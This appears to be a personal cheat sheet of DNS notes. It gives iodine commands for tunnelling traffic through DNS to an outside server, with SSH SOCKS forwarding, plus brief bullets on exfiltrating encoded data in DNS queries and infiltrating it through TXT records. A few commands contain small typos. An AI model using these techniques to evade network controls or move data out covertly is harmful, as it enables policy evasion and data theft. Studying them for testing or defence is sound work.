# DNS

* [Root Servers](https://www.iana.org/domains/root/servers)
* [Zones](https://www.cloudflare.com/learning/dns/glossary/dns-zone/)
* [Records](https://www.cloudflare.com/learning/dns/dns-records/)

## Tunneling
* [Tunnel IPv4 Data through DNS](https://github.com/yarrick/iodine.git)
* Start server on an outside DNS server. This may be a evs.
```sh 
iodined -b 47110-f 10.0.0.1 tunnel.test.com
```
* Use client via
```sh
iodine -f -r <server-IP> tunnel.test.com
```
* `NS` record of the owned domain should contain the subdomain, e.g. `tunnel.test.com`
* Client gets a tunnel IP in the range of `10.0.0.0/8`
* Check connection via 
```sh
ping <server-IP>
```
* Generate ssh-key and put in on the server
* Dynamic port forwarding to server via
```sh
ssh <user>@10.0.0.1 -D 8080
```
* User proxy server on the client's web server like `--proxy-server` or use a SOCKS proxy like FoxyProxy

## nslookup
```sh
nslookup type=txt <domain>
```

## Reverse lookup
* Stored inside `PTR` record
* Reverse IP may look like `<IP>.in-addr.arpa.`, but not via `drill` or `dig`
```sh
drill -x +short <IP>
```

## Exfiltration
* Add data to UDP DNS requests
* Capture traffic on an owned DNS server
* `253` is the max length of a DNS name
* Encode the payload to hide it 

## Infiltration
* Inside `TXT` or any other possible records